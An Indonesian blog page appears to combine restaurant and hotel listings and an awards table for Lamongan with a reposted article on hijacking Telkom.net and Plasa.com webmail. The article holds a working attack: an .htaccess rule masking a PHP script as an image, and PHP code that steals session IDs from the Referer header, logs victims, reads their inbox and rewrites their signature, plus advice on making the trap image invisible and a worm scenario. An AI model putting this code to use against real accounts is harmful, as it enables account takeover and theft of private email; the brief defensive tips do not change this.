Rumah Makan & Restoran  

Oleh M. Akbar Fitriyan, Hs

» PALM KENDIL WESI
Jl. Raya Paciran Lamongan 662085
» KEMUNING
Jl. Timur Sunan Drajat Paciran Lamongan
» SOTO AYAM MANDALA
Jl. Jend. P. Sudirman 61 Lamongan
» DEPOT ASIH JAYA 2
Komplek Lamongan Indah Jl. Pb. Sudirman 4A Lamongan Telp. (0322) 322934
» DEPOT RESTU
Jl. Raya No. 12 Paciran Lamongan
» DEPOT MEKAR JAYA 3
Jl. Raya No. 17 Paciran Lamongan Telp. (0322) 662268
» DEPOT MEKAR JAYA 2
Jl. Raya Paciran Lamongan Telp. (0322) 661353
» DEPOT LIMAJAYA
Jl. Raya Plaosan 20 Babat-Lamongan Telp. (0322) 451593
» DEPOT MIRA
Jl. Raya Simpang Tiga 100 Babat-Lamongan
» DEPOT KITA 2
Jl. Raya Plaosan 6 Babat-Lamongan Telp. (0322) 451506
» DEPOT KITA 1
Jl. Raya 262 Babat-Lamongan Telp. (0322) 451415
» KALIOTIK
Jl. Ja. Suprapto 39 Lamongan

Baca Selengkapnya..

Hotel Lamongan  

Oleh M. Akbar Fitriyan, Hs

» WIJAYA
JL. LAMONGREJO 74-76 LAMONGAN
» BHARATA
JL. LAMONGREJO 45 LAMONGAN
» BAHAGIA
JL. A. YANI 67 LAMONGAN
» LIMA JAYA
JL. RAYA PLAOSAN 20 BABAT-LAMONGAN TELP. (0322) 322640
» MAHKOTA 2
JL. SUNAN DRAJAT 101 LAMONGAN TELP. (0322) 312159
» MAHKOTA 1
JL. SUNAN DRAJAT 8 LAMONGAN TELP. (0322) 321060

Baca Selengkapnya..

Prestasi-Prestasi yang diraih Lamongan  

Oleh M. Akbar Fitriyan, Hs

Waktu



Bidang

Jenis Penghargaan

Tempat Penerimaan

Keterangan

9 Peb ‘01



Olah Raga

Pembina Olah Raga Terbaik se Jatim (SIWO PWI JATIM)

Surabaya

Hari Pers Nasional

3 Sep ‘01



Peternakan

Juara Inseminasi Tingkat Nasional

Jakarta

Hari Peternakan Nasional

2 Mei ‘02



Pendidikan

Menerima Penghargaan Widya Krama Pratama dari Presiden Megawati Soekarno Putri

Jakarta

Hari Pendidikan

29 Okt ‘02



Pendidikan

Juara I Olimpiade Biologi Nasional


Dalam Rangka Olimpiade Biologi

7 Juli ‘02



Pendidikan

Juara I-V Lomba Peneliatian Ilmiah Remaja


Dalam Rangka Penelitian Ilmiah Remaja (Lpir)

2 Nop '02



Perikanan

Juara III Lomba Intensifikasi Tambak Tingkat Nasional

Surabaya

Dalam Rangka Lomba Intensifikasi Tambak

2 Nop '02



Perikanan

Juara II Lomba Intensifikasi Budi Daya (INBUD) tingkat Propinsi Jawa Timur

Surabaya

Dalam Rangka Lomba Intensifikasi Budi Daya

9 Apr '03



Ekonomi

Kategori Terbaik: Daerah dengan Komitmen Menonjol Dalam Pengembangan Ekonomi (Grand Category Region in Leading Commitment on Economic Deve-lopment) dalam acara penganugerahan Ortonomi Award Target Pelunasan Pajak Bumi dan Bangunan PBB


Penganugerahan

Otonomi Award

2003



Otonomi Award

a Piala untuk Kategori Terbaik Daerah dengan Komitmen Menonjol Dalam Pengembangan Ekonomi (Grand Category Region in Leading Commitment on Economic Development).

b Spesial Kategori Daerah dengan Terobosan Inovatif Ekonomi dalam Pemberdayaan Ekonomi Lokal (Region in an Innovative Breakthrough on on Local Economic.

c Sertifikat Nominasi Daerah dengan Inovasi Pelayanan Kesehatan (Region in an Innovative Breakthrough on Health Service).



22 Sep '02



Olah Raga

Menerima Brivet Wing II Paskhas dari Komandan Lanud Abd. Rohman Saleh Malang

Malang

Ulang tahun Paskhas

28 Mei '04



Ekonomi

Meraih Grand Kategori sebagai daerah yang memiliki komitmen terhadap pembangunan ekonomi (Grand Cate gory Region in Leading Commitment on Economic)

Surabaya

Penganugerahan

Otonomi Award

28 Mei '04



Ekonomi

Meraih special Kategori daerah yang memiliki inovasi terhadap pertumbuhan ekonomi (Region In on Innovative Breakthrough on Economic Growth).

Surabaya

Penganugerahan

Otonomi Award

21 Mei '04



Pertanian

Juara I Pengembangan Sistem dan Usaha Agribis Padi tingkat Propinsi Jawa Timur

Surabaya

Dalam rangka lomba Intensifikasi Agribisnis Pertanian

21 Jul '04



Pertanian

Juara I Unit Pelayanan Pengembangan dan Sistem dan Usaha Agribisnis Jagung Tingkat Propinsi Jawa Timur

Surabaya

Dalam rangka lomba Intensifikasi Agribisnis Pertanian

21 Jul '04



Pertanian

Juara I Unit Pelayanan Pengembangan, Pengolahan Hasil Pertanian (UP3HP) Pengolahan Tepung Jagung tingkat Propinsi Jawa Timur


Dalam rangka Lomba Ketahanan Pangan

21 Jul '04



Pertanian

Mengikuti Lomba Pengembangan Sistem dan Usaha Agribis Padi tingkat Nasional masih dalam penilaian


Dalam rangka lomba Intensifikasi Agribisnis Pertanian

21 Jul '04



Pertanian

Mengikuti Lomba Pengembangan Ketahanan tingkat Nasional di Kelompok Lumbung Pangan Harapan MakmurDesa Gumantuk Kecamatan Maduran masih dalam penilaian


Dalam rangka lombaIntensifikasi Agribinis Pertanian

20 Ags’04



Pendidikan

Menerima penghargaan dari Presiden RI atas keberhasilan Pencetur Pendidikan Anak dini usia (PADU)

Jakarta

Seminar tentang padu

25 Mei '04



Pertanian

Juara I Lomba Karya Ilmiah Remaja (LKIR) se Pulau Jawa bidang IPA

Yogyakarta

Dalam rangka Lomba Karya Ilmiah Remaja (LKIR)

25 Mei '04



Pendidikan

Juara I Lomba Karya Ilmiah Remaja (LKIR) se Pulau Jawa bidang Karya Teknologi

Yogyakarta

Dalam rangka Lomba Karya IImiah Remaja (LKIR)

28 Ags '04



Pendidikan

Juara III Pra Olimpiade Sains Tingkat Propinsi Bidang Kimia

Surabaya

Dalam rangka Olimpiade Sains

28 Ags'04



Pendidikan

5 besar Olimpiade Sains Tingkat Nasional Bidang Kimia

Pekanbaru

Dalam rangka

Olimpiade Sains

3 Sep '04



Peternakan

Mengikuti Lomba Optimalisasi Pelelangan Ikan (OPTILANPI) tingkat Nasional (masih dalam penilaian)

Jakarta

Dalam rangka lomba Pelelangan Ikan (PTI LANTA)

11 Sep '04



Perhubungan

Peringkat IV Pemilihan Pelajar PeloporTertib Lalu Lintas tingkat Propinsi

Surabaya

Dalam rangka Lomba Tertib Lalu Lintas

18 Sep '04



Perpajakan

Peringkat IV Pelunasan PBB Tercepat se Jawa Timur

Surabaya

Dalam rangka Lomba Intensifikasi Perpajakan

28 Old '04



Kepemudaan

Anugrah Kepemudaan tingkat Nasional dan ASEAN

Jakarta

dalam rangka Hari

28 Old '04



Kepemudaan

Anugrah Pemuda Pelopor Tingkat Nasional

Jakarta

dalam rangka Hari Sumpah Pemuda

2004



Otonomi Award

a Daerah yang memiliki komitmen terhadap pembangunan ekonomi (grand category region in leading commitment on economic ).

b Untuk spesial katagori daerah yang memiliki inovasi terhadap pertumbuhan ekonomi ( region in an innovative breakthrough on economic growth).



25 Juli '05



Pendidikan

Juara III Lomba International

Chemistry Olympiade (I Ch 0)

Taipeh

23 Sep '05



Pariwisata

Meraih The Most Achievment of Development dart Gubenur karena dinilai berhasil membangun kawasan wisata modern

Pandaan, Pasuruan

Dalam rangka Anugrah Wisata Jawa Timur 2005

28 Sep '05



Peternakan

Juara I Lomba ternak tingkat Nasional untuk dua kategori, yaitu Pejantan PO (Peranakan Ongole) dan Kareman PO serta Juara III masing-masing jenis Induk PO dan jenis Pejantan PO

Pandaan, Pasuruan

Dalam rangka Kontes Ternak Pekan Peternakan Unggulan Nasional2005

29 Nop '05



Jasa Pelayanan

Menerima Sertifikat keberhasilan keberhasilan di bidang jasa pelayanan dari ISO 9001 : 2000

Surabaya

Penilaian Pelayanan Publik

29 Nop '05



Jasa Pelayanan

Unit pelayanan masyarakat percontohan terbaik Se-Jatim dari Gubernur

Surabaya

Penilaiann Pelayanan Publik

09 Des '05



Pertanian

Juara Lumbung pangan Nasional

Jakarta

Hari Pangan Nasional

09 Des '05



Pertanian

Juara Lomba Agribisnis

Jagung Tingkat Nasional

Jakarta

2005



Otonomi Award

a Daerah Dengan Terobosan Inovatif Pada Pertumbuhan Ekonomi (Region In An Innovative Breakthrough On Economic Growth),

b Terobosan Inovatif Pada Pemberdayaan Ekonomi Lokal (Region In An Innovative Breakthrough On Local Economic).



2006




a. Penghargaan dari Gubernur Jawa Timur sebagai Pembina terbaik Kelompok Informasi Masyarakat.

Surabaya

KIM





b. Penghargaan Piala Citra Bhakti Abdi Negara yang diserahkan Presiden Susilo Bambang Yudoyono kepada Bupati Masfuk. Kabupaten Lamongan dinilai mampu meningkatkan kualitas pelayanan publik terbaik.

Jakarta

Pelayanan Publik

2006



Otonomi Award

a Daerah dengan terobosan dan inovasi pada pemberdayaan ekonomi lokal (Region In An Innovative Breakthrough On local Economic),

b. Nominasi daerah menonjol pada akuntabilitas publik (Region In A leading Profile on Public accountability



2007




a. Menerima penghargaan PWI Award dari Ketua PWI Pusat

b. Menerima penghargaan dari DPD REI Jawa Timur atas peranan Kepala Daerah dalam percepatan pembangunan perumahan

c. Menerima anugerah Adipura dari Presiden RI sebagai kota terbaik dalam pengelolaan lingkungan perkotaan kategori kota kecil.

d. Menerima tanda penghargaan Manggala Karya Bakti Husada Arutala dari Menteri Kesehatan Siti Fadilah Supari (13/11).

e. Surya Property Award dari Menteri Negara Perumahan Rakyat RI

f. Profesional Award dari Gubernur Jawa Timur

g. Penghargaan Administrasi Kependudukan Kategori Pembebasan Pengurusan Akte Kelahiran umur 0-60 hari dari Menteri pemberdayaan wanita.

h. Penghargaan Upakarti Kategori Kepedulian Jasa dari Presiden RI



2007



Otonomi Award

Kategori khusus : Daerah yang menjadi profil pemimpin dalam partisipasi publik (Special category : Region in a leading profile on public participation),

Nominasi kategori khusus : Daerah yang melakukan terobosan inovatif dalam pemerataan ekonomi (Spcesial category : Region in an innovative breakthrough on economic equity)

Nominasi kategori khusus : Daerah yang melakukan terobosan inovatif dalam pelayanan pendidikan (Special category : Region in an innovative breakthrough on education service)



2008




a. Anugerah bhakti adhikarsa Pratama dari PSSI Jawa Timur

b. Sebagi Bupati terbaik se Indonesia Bidang Perdagangan, Pariwisata dan Investasi (RTTI Award 2008) dari DPD RI






OTONOMI AWARD

a. Nominasi: Daerah dengan trobosan inovatif bidang Pertumbuhan Ekonomi.

b. Nominasi: Daerah dengan trobosan inovatif bidang Peemerataan Ekonomi

c. Nominasi: Daerah dengan trobosan inovatif bidang Pemberdayaan Ekonomi Lokal.

d. Nominasi: Daerah dengan trobosan inovatif bidang Pelayanan Pendidikan

e. Nominasi: Daerah dengan trobosan inovatif bidang Pelayanan Administrasi Dasar

f. Nominasi: Daerah dengan trobosan inovatif bidang Pemenuhan Sarana Dan Prasarana Umum

g. Nominasi: Daerah dengan trobosan inovatif bidang Partisipasi publik

h. Nominasi: Daerah dengan trobosan inovatif bidang Pelembagaan Politik.

Baca Selengkapnya..

Hacking Email Telkom.net dan Plasa.com  

Oleh M. Akbar Fitriyan, Hs

Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

Webmail Session Hijacking

Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.

Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.

SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:

  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:

    Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.

SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.

Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.

Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

telkom.net URL


plasa.com URL

plasa.com URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:

http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&

http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&

Stealing SessionID from Referer Header

Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.

Ketika pengunjung sedang membuka halaman dengan URL:

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX

Kemudian ketika terjadi request ke sebuah file image:

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif

Maka pada request GET tersebut akan ada header seperti di bawah ini:

1

2
3
4
5
6
7
8
9
10
11
GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1

Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0

Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.

Attack Scenario

Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.

Preparing the Script

Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.

URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:

1

2
3
RewriteEngine On

RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php

Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.

1

2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88


// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,"telkom.net")>-1) {
$telkomnet = true;
}
if (strpos($ref,"plasa.com")>-1) {
$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
exit();
}

$file = fopen("daftarkorban.txt","a");
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode("/",$ref);
$sessid = $tokens[4];
fwrite($file,"######\n");
fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
fwrite($file,"SESSID:".$sessid."\n");

$urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
$inboxhtml = file_get_contents($urlhost);

preg_match((.*?)'/<\/title>/i', $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title," ");
if ($pos > -1) {
$email = substr($title,0,$pos);
}

fwrite($file,"KORBAN:".$email."\n");
fwrite($file,"******\n");
fclose($file);

$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);

// Writing Signature...
$url = "http://mail.telkom.net/Session/$sessid/settings.wssp";
if ($plasacom==true) {
$url = "http://mail1.plasa.com/Session/$sessid/settings1.wssp";
}
$old_settings = file_get_contents($url);
preg_match('/(.*?)<\/textarea>/i', $old_settings, $matches);
$oldsig = $matches[2];

$data = array();
$data["UserFrom"] = $email;
$newsig = "[YOUR EMAIL HAS BEEN HACKED]".$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = "Update";

$response = doPost($url,$data);
if ((strpos($response,"Updated")>-1 && $telkomnet==true) || $plasacom==true) {
ImageString($image, 3, 35, 50, "Signature anda berhasil diganti menjadi:" , $white);
ImageString($image, 3, 45, 65, $newsig , $white);
}
header("Content-Type: image/jpeg");
ImageJpeg($image);
ImageDestroy($image);

function doPost($url,$data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
if(curl_errno($ch))
{
$response = curl_error($ch);
}
curl_close($ch);
return $response;
}
?>

Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.

Launch The Attack

Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.

compose attack email

compose attack email

Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.

signature1

Dan gambar berikut adalah gambar ketika email attacker tiba.

email attacker tiba

email attacker tiba

Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.

victim open email and his session hijacked instantly

victim open email and his session hijacked instantly

Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.

signature2

Worm Attack: More Dangerous Scenario

Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.

Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.

Tips Menghindari Serangan

Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.

From: www.ilmuhacking.com

Baca Selengkapnya..